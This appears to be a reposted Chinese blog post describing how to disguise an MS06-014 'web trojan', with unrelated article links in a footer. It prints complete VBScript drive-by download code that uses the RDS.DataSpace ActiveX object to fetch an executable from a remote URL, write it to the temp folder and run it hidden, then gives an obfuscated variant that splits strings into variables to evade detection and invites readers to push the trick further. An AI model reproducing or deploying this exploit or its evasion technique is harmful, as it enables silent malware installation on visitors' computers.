• MS06014网马的一种变形方法


    MS06014网马的一种变形方法 By_恒 QQ:5454443 请看原始代码 <script language="VBScript"> on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> 请大家看变形后的代码: <script language="VBScript"> on error resume next xx="object" xxx="classid" xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" xxxxx="Microsoft.XMLHTTP" xxxxxx="GET" xxxxxxx="Scripting.FileSystemObject" xxxxxxxx="Shell.Application" dl = "http://www.baidu.com/heng.exe" Set df = document.createElement(xx) df.setAttribute xxx, xxxx str=xxxxx Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6=xxxxxx x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject(xxxxxxx,"") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(xxxxxxxx,"") Q.ShellExecute fname1,"","","open",0 </script> 很容易就发现了,我把“”包含的内容都声明成了变量,然后在代码里直接引用变量就可以了。 a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 这个还可以变形成这样, a1="Ado" a2="db." a3="Str" a4="ea" a5="m" str1=a1&a2&a3&a4&a5 发现差别了吗?实际上每个字符都可以这样处理,我懒得整而已呵呵。大家自己举一反三吧。
  • 相关阅读:
    Android--Service之AIDL传递复杂对象
    Android--广播BroadcastReceiver
    Android--拦截系统BroadcastReceiver
    Android--操作图片Exif信息
    Android--Activity的启动模式
    Android--Task和BackStack高级
    终于完成了Josephus的C语言实现啦~~
    如何将.SQL文件的数据导入到Mysql的数据库中
    什么情况下要加上【javascript:】
    路径的写法
  • 原文地址:https://www.cnblogs.com/adodo1/p/4327649.html
Copyright © 2020-2023  润新知